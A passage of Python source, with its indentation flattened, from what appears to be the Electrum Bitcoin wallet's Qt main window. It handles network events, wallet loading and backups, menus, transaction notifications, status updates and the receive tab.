choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
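        # Schedule 'coro' on the network's asyncio event loop from the wallet's
        # TaskThread; the result is passed to 'on_result', and exceptions are
        # surfaced on the GUI thread via show_error_signal.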
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
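        # Resolve the configured OpenAlias (config key 'alias') on a background
        # thread and emit alias_received_signal once the lookup has finished.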
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
            t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
        # Once the GUI has been initialized, check whether we need to announce anything,
        # since the callback may have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
        except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = get_backup_dir(self.config)
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
        try:
            sorted(recent)  # sanity check: the stored value must be a sortable list
        except Exception:
            recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
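        # Drain the tx notification queue and show tray notifications; skipped
        # while the wallet is still syncing and rate-limited to one burst per
        # 20 seconds. Three or more new transactions are combined into a single
        # summary notification.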
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
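        # Keep a BTC amount edit and its fiat counterpart in sync: whichever
        # field was edited last drives the other using the current FX rate, and
        # the derived field is highlighted in blue. If fee_e is given, edits
        # also trigger a fee update.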
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
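        # Rebuild the status bar text, tray tooltip and status icon from the
        # current network state: offline / synchronizing / lagging server /
        # balance summary (optionally with lightning and fiat amounts).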
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a bitcoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
